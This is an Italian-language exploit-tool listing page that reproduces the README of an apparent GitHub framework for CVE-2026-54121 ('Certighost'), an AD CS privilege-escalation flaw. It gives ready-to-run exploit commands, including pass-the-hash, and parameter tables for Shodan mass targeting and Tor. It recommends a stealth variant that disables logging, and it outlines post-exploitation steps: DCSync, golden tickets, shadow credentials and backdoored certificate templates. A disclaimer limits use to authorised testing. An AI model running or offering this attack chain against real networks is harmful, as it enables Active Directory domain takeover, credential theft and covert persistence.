Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-54121-PoC-Exploit — 👻 CVE-2026-54121 - Il miglior framework multi-exploit CertiGhost AD CS | Toolkit avanzato con server DC/LDAP rogue, abuso di certificati, estrazione di hash PKINIT. Caratteristiche: rilevamento del controllo di sicurezza, exploit completamente multi-threaded. 🛡️ CVSS 8.8 Alto - Usa eticamente, resta legale. 🔒 | Kitploit
Strumenti/GitHubGitHub/tc4dy/cve-2026-54121-poc-exploit
Autenticazione e AutorizzazioneFrameworks per Penetration TestingEscalation di PrivilegiFramework di ExploitExploitMovimento LateralePost-ExploitSviluppo Payload

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
GitHub
tc4dy/cve-2026-54121-poc-exploit

CVE-2026-54121-PoC-Exploit

Vedi Repository
27625 giorni faNon ancora revisionato

Informazioni

👻 CVE-2026-54121 - Il miglior framework multi-exploit CertiGhost AD CS | Toolkit avanzato con server DC/LDAP rogue, abuso di certificati, estrazione di hash PKINIT. Caratteristiche: rilevamento del controllo di sicurezza, exploit completamente multi-threaded. 🛡️ CVSS 8.8 Alto - Usa eticamente, resta legale. 🔒

Condividi

CVE-2026-54121

CVE-2026-54121 - AD CS "Certighost" Framework-Toolkit per l'Elevazione dei Privilegi

CVE-2026-54121 CVSS 8.8 Python 3.6+

Privilege Escalation Identity Impersonation Domain Admin

Active Directory Certificate Services — Certighost → Compromissione del Dominio

Framework di Exploit e Toolkit di Audit
Solo per test di sicurezza autorizzati.

---

⚖️ Dichiarazione di Esclusione di Responsabilità e Uso Responsabile

Questo strumento è fornito esclusivamente a scopo educativo e per test di penetrazione autorizzati. Gli autori e i collaboratori non sono responsabili per qualsiasi uso improprio o danno causato da questo software. Gli utenti sono gli unici responsabili di assicurarsi di avere un permesso scritto esplicito dal proprietario del target prima di effettuare i test. L'accesso non autorizzato a sistemi informatici è illegale ai sensi delle leggi federali, statali e internazionali sulla criminalità informatica applicabili. Utilizzando questo software, accetti di:

  • Utilizzarlo solo su sistemi di tua proprietà o per i quali hai un permesso esplicito di test.
  • Conformarti a tutte le leggi locali, statali e federali applicabili.
  • Non utilizzarlo per attività dannose, distruttive o illegali.

⚠️ AVVERTENZA: Le vulnerabilità di elevazione dei privilegi in Active Directory presentano un rischio elevato per le infrastrutture aziendali. I test non autorizzati sono severamente vietati.


[+!] Panoramica della Vulnerabilità

CVE-2026-54121 (Soprannominata "Certighost") è una vulnerabilità di Elevazione dei Privilegi (EoP) in Microsoft Active Directory Certificate Services (AD CS). Consente a utenti di dominio con privilegi bassi di impersonare gli account macchina dei Domain Controller e ottenere il pieno controllo come Domain Admin tramite la contraffazione di certificati.

Come funziona:

  1. Bypass della validazione del target: La vulnerabilità esiste a causa di controlli di autorizzazione impropri (CWE-285) in AD CS durante la gestione dei parametri target delle richieste di certificato.
  2. Redirezione verso un server rogue: L'Autorità di Certificazione (CA) accetta target di redirezione forniti dal client senza verificare se il target è un Domain Controller autorizzato.
  3. Impersonazione del Domain Controller: La CA interroga il server controllato dall'attaccante ed emette un certificato computer valido firmato con l'identità di un Domain Controller privilegiato.
  4. Compromissione totale del dominio (DCSync): Utilizzando il certificato DC contraffatto, l'attaccante si autentica tramite Kerberos/PKINIT per ottenere privilegi di Domain Controller ed eseguire operazioni DCSync.

Dati principali:

Avvertenza! 🌬️

Questo codice è stato scritto pensando a un approccio user-friendly ed è pienamente funzionante, dando priorità a sicurezza, privacy e registrazione minima dei log. Si consiglia di rimuovere completamente l'integrazione e la libreria Shodan, utilizzare un singolo thread invece di un thread pool, rimuovere la scansione delle porte e detect_ip, e disabilitare log e output. Usa "stealthcert.py" per questa versione.

CVE-2026-54121 CertiGhost - Riferimento dei Parametri


📋 Elenco Completo dei Parametri

Parametri dell'Exploit Python


stealthcert.py (Exploit Sicuro)


Parametri del Wrapper PowerShell

🚀 Esempi di Utilizzo

root@kitploit:~
git clone https://tc4dy/CVE-2026-54121-PoC-Exploit
#installa i requisiti

Esempi ❄️

root@kitploit:~
# Auto-scopre la CA tramite LDAP, crea un computer temporaneo, avvia server rogue, richiede un certificato con redirect cdc, estrae l'hash NT del DC tramite PKINIT, abilita DCSync per la compromissione del dominio
python3 certighost.py -d playground.local -u lowpriv -p Password123 --dc-ip 192.168.1.10

# Impersona un Domain Controller specifico (DC01$). Utile quando sai esattamente quale DC colpire. Bypassa l'auto-scoperta
python3 certighost.py -d corp.local -u user -p Passw0rd --dc-ip 10.0.0.1 --target-san DC01$

# Usa l'hash NTLM invece della password. Funziona quando la password è sconosciuta ma l'hash è disponibile. ':' prima dell'hash = hash LM vuoto
python3 certighost.py -d domain.local -u admin --hashes :8846f7eaee8fb117ad06bdd830b7586c --dc-ip 192.168.1.10

# Bypassa l'auto-scoperta della CA tramite LDAP. Usa IP e nome CA forniti esplicitamente. Utile quando LDAP è limitato o la CA è su una subnet diversa
python3 certighost.py -d playground.local -u lowpriv -p Password123 --dc-ip 192.168.1.10 --ca-ip 192.168.1.20 --ca "PLAYGROUND-CA"

PowerShell (Rilevamento)

root@kitploit:~
# Query LDAP nativa per verificare se AD CS è presente. Restituisce nome CA e DNS. Sola lettura, sicura per la produzione. Nessun exploit eseguito
.\CertiGhost.ps1 -d playground.local --dc-ip 192.168.1.10 --username lowpriv -p Password123 --detect

Exploit Backend Python

root@kitploit:~
# Esegue il rilevamento nativo di AD CS e poi chiama certighost.py Python con tutti i parametri. Richiede certighost.py nella stessa directory. Stampa l'hash NT e il file ccache
.\CertiGhost.ps1 -d corp.local --dc-ip 10.0.0.1 --username attacker -p P@ssw0rd --exploit --target-account DC01$

Salva JSON, Modalità Rilevamento

root@kitploit:~
# Modalità solo rilevamento. Salva i risultati in formato JSON. Utile per automazione, report e integrazione con altri strumenti di sicurezza
.\CertiGhost.ps1 -d domain.local --dc-ip 192.168.1.10 --username user -p pass --detect -o results.json

🧠 Analisi Tecnica Approfondita

1. Bypass della Validazione del Target in AD CS (Certighost)

La vulnerabilità deriva da controlli di autorizzazione e validazione impropri (CWE-285) all'interno di Active Directory Certificate Services (AD CS) durante i processi di registrazione dei certificati. Un attaccante con credenziali di dominio a bassi privilegi può manipolare i parametri di redirezione del target per indurre l'Autorità di Certificazione (CA) a verificare le asserzioni di identità contro endpoint rogue.

Endpoint Vulnerabile / Contesto della Richiesta:

root@kitploit:~
POST /certsrv/mscep/mscep.dll HTTP/1.1
Host: ca-server.domain.local
Content-Type: application/x-www-form-urlencoded

... (Payload della richiesta di certificato con parametri target/cdc manipolati)

2. Vettori di Attacco

  • Manipolazione del Chase Target: Un attaccante modifica i parametri di redirezione del target (come cdc / chase target) all'interno della richiesta di certificato, costringendo l'Autorità di Certificazione (CA) a instradare il traffico di verifica verso un endpoint specificato.

  • Redirezione verso Server Rogue: L'Autorità di Certificazione (CA) avvia connessioni LDAP o SMB verso la destinazione fornita dal client senza validare se il target è un Domain Controller legittimo e autorizzato.

  • Falsificazione dell'Identità del DC ed Emissione del Certificato: Il server rogue controllato dall'attaccante risponde alle query di verifica emesse dalla CA per conto dell'account Domain Controller preso di mira. Basandosi su questa risposta, la CA emette un certificato firmato valido che porta l'identità del Domain Controller.


3. Post‑Exploitation

Recupero del Ticket Granting Ticket (TGT)

Utilizzando il certificato del Domain Controller ottenuto, viene eseguita l'autenticazione Kerberos tramite PKINIT (Public Key Cryptography for Initial Authentication) per recuperare un TGT ad alti privilegi.

Attacco DCSync

Con un ticket Kerberos che possiede privilegi di Domain Controller, gli hash delle password di tutti gli account nel database di Active Directory (es. krbtgt, Administrator) vengono estratti utilizzando la tecnica DCSync.

Persistenza

  • Creazione del Golden Ticket: I TGT vengono falsificati su richiesta utilizzando l'hash della password dell'account krbtgt estratto.
  • Shadow Credentials: Chiavi di certificato non autorizzate vengono aggiunte all'attributo msDS-KeyCredentialLink degli account presi di mira per garantire un accesso persistente.
  • Manipolazione dei Modelli di Certificato: I permessi dei modelli AD CS vengono modificati per mantenere configurazioni backdoor che consentono future escalation di privilegi.

Movimento Laterale

  • Dominio del Dominio: Sessioni con pieni privilegi (SYSTEM / Domain Admin) vengono stabilite su tutti i server e le workstation all'interno del dominio.
  • Pivoting Cross-Forest: L'attraversamento verso domini associati (Forest Trust) viene ottenuto utilizzando tecniche di SID History o TGT Delegation.

📚 Riferimenti

  • NVD - CVE-2026-54121
  • Microsoft Security Update Guide - CVE-2026-54121
  • CERT/CC Vulnerability Note
  • MITRE ATT&CK - T1649: Steal or Forge Authentication Certificates

🔗 Altri Exploit

  • CVE-2026-15409/15410 - SonicWall SMA1000 Multi-Exploit Framework
  • CVE-2026-6875 - ServiceNow Pre-Auth RCE Exploit Framework
  • CVE-2026-41091 - SolarFlare (RedSun) Microsoft Defender LPE
  • CVE-2026-57821 - Apache Fineract SQL Injection Toolkit
  • CVE-2026-41940 - cPanel/WHM Authentication Bypass
Scarica lo strumento
AttributoValore
📅 Scoperta / PatchLuglio 2026 (Microsoft Patch Tuesday)
⚠️ Punteggio CVSS8.8 (ALTO)
🏷️ Nome in codiceCertighost
🎯 Prodotti interessatiMicrosoft Active Directory Certificate Services
🔄 Versioni corretteAggiornamento di sicurezza di luglio 2026
🔓 AutenticazioneAccount di dominio con privilegi bassi
🌍 ImpattoCompromissione completa del dominio Active Directory
ParametroDescrizioneEsempio
-d, --domainNome DNS del dominio target (obbligatorio)-d playground.local
-u, --usernameUtente di dominio con privilegi bassi (obbligatorio)-u lowpriv
-p, --passwordPassword dell'utente-p Password123
-H, --hashesHash NTLM [LM:]NT-H :8846f7eaee8fb117ad06bdd830b7586c
--dc-ipIP del Domain Controller (obbligatorio)--dc-ip 192.168.1.10
--ca-ipIP dell'Autorità di Certificazione (opzionale)--ca-ip 192.168.1.20
--caNome della CA (auto-scoperto se non impostato)--ca "PLAYGROUND-CA"
--listenerIP dell'attaccante per i server rogue--listener 192.168.1.100
--target-sanAccount computer da impersonare (es. DC01$)--target-san DC01$
--templateModello di certificato (predefinito: Machine)--template Machine
--computer-nameNome di un account computer esistente (con $)--computer-name GHOSTABCD$
--computer-passPassword di un computer esistente--computer-pass CGabc123...
--computer-hashHash NT di un computer esistente--computer-hash 8846f7ea...
--use-ldapUsa LDAP (389) invece di LDAPS (636)--use-ldap
--exploitEsegui l'exploit--exploit
--detectSolo rilevamento (nessun exploit)--detect
-t, --threadsNumero massimo di thread per la scansione di massa-t 10
--timeoutTimeout per richiesta (secondi)--timeout 10
--retryNumero di tentativi in caso di errore--retry 3
--delayRitardo base tra le richieste--delay 1.0
--proxyURL del proxy--proxy http://127.0.0.1:8080
--no-verifyDisabilita la verifica SSL--no-verify
--torUsa proxy Tor (socks5h://127.0.0.1:9050)--tor
-o, --outputFile di output (.json, .csv, .jsonl)-o results.json
-v, --verboseOutput dettagliato-v
-q, --quietModalità silenziosa-q
-h, --helpMostra l'aiuto-h
ParametroDescrizioneEsempio
-t, --targetIP o hostname della CA target (obbligatorio)-t 192.168.1.20
-d, --domainNome DNS del dominio target (obbligatorio)-d playground.local
--dc-ipIP del Domain Controller (obbligatorio)--dc-ip 192.168.1.10
-u, --usernameUtente di dominio con privilegi bassi (obbligatorio)-u lowpriv
-p, --passwordPassword dell'utente-p Password123
-H, --hashesHash NTLM [LM:]NT-H :8846f7eaee8fb117ad06bdd830b7586c
--computer-nameNome di un account computer esistente (con $)--computer-name GHOSTABCD$
--computer-passPassword di un computer esistente--computer-pass CGabc123...
--computer-hashHash NT di un computer esistente--computer-hash 8846f7ea...
--target-accountAccount da impersonare (es. DC01$)--target-account DC01$
--templateModello di certificato (predefinito: Machine)--template Machine
--listenerIP dell'attaccante per i server rogue (rilevamento automatico se non impostato)--listener 192.168.1.100
--use-ldapUsa LDAP (389) invece di LDAPS (636)--use-ldap
--keep-filesConserva i file .pfx e .ccache (predefinito: elimina)--keep-files
-h, --helpMostra l'aiuto-h
ParametroDescrizioneEsempio
-u, --urlIP o hostname della CA target-u 192.168.1.20
-l, --listFile contenente i target (uno per riga)-l targets.txt
--shodanCarica i target da Shodan--shodan
--shodan-queryQuery di ricerca Shodan--shodan-query "AD CS Certificate"
-d, --domainNome DNS del dominio target (obbligatorio)-d playground.local
--dc-ipIP del Domain Controller (obbligatorio)--dc-ip 192.168.1.10
--usernameUtente di dominio con privilegi bassi (obbligatorio)--username lowpriv
-p, --passwordPassword dell'utente-p Password123
-H, --hashesHash NTLM [LM:]NT-H :8846f7ea...
--computer-nameNome di un account computer esistente (con $)--computer-name GHOSTABCD$
--computer-passPassword di un computer esistente--computer-pass CGabc123...
--computer-hashHash NT di un computer esistente--computer-hash 8846f7ea...
--target-accountAccount da impersonare (es. DC01$)--target-account DC01$
--templateModello di certificato (predefinito: Machine)--template Machine
--listenerIP dell'attaccante per i server rogue--listener 192.168.1.100
--use-ldapUsa LDAP (389) invece di LDAPS (636)--use-ldap
--exploitEsegui l'exploit--exploit
--detectSolo rilevamento (nessun exploit)--detect
-t, --threadsNumero massimo di thread per la scansione di massa-t 10
--timeoutTimeout per richiesta (secondi)--timeout 10
--retryNumero di tentativi in caso di errore--retry 3
--delayRitardo base tra le richieste--delay 1.0
--proxyURL del proxy--proxy http://127.0.0.1:8080
--no-verifyDisabilita la verifica SSL--no-verify
--torUsa proxy Tor--tor
-o, --outputFile di output (.json, .csv, .jsonl)-o results.json
-v, --verboseOutput dettagliato-v
-q, --quietModalità silenziosa-q
-h, --helpMostra l'aiuto-h